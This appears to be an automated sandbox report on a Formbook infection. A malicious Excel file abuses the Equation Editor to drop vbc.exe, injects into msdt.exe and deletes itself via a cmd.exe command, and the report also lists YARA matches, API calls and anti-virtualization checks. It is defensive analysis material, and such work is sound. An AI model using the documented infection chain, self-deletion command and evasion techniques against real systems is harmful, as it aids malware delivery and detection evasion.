          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040604C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404772
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00460A3A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C8C5
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8F3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C134
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D2AE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C8B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF5F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00743040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00747353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00742305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007663DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00775485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00786540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00744680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007757C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C5955
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026D1238
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262E2E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0267A37B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02637353
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02632305
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262F3CF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026563DB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026D63BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02633040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264905A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0265D005
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262E0C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026D2622
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0267A634
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263E6C1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02634680
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026657C3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263C7BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B579A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0266D47D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B443E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02665485
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02641489
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02676540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263351F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264C5F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026E3A83
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02657B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026BDBDA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262FBD7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026DCBA4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0265286D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263C85C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026CF8EE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B394B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B5955
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026469FE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026329B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026D098E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264EE4C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02662E2F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0265DF7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02640F3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A2FDC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026CCFB1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263CD5B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02660D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026CFDDD
          Source: C:\Users\Public\vbc.exeCode function: String function: 007AF970 appears 49 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00783F92 appears 79 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0078373B appears 143 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073DF5C appears 78 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0269F970 appears 78 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0262E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0262DF5C appears 117 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0267373B appears 244 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 02673F92 appears 116 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418720 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185EA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02620060 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02620078 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02620048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02621148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02621930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02620C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261FD5C NtEnumerateKey,
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll 4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$W6902.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD93E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@6/5
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.462720602.0000000000430000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504101247.0000000000720000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504998016.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.464331880.0000000000590000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000007.00000002.669422875.0000000002610000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.503886261.0000000002240000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000002.669567128.0000000002790000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.504934771.0000000002480000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: vbc.exe, 00000005.00000002.505482723.0000000002580000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000003.502497513.0000000002480000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.501834417.0000000002380000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B832 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B83B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004160CB push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8D6 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8F3 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B89C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C134 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00407265 push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004152C7 push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041537D push ebp; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5DD push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415F76 push ds; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7E5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408783 push ecx; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\Public\vbc.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
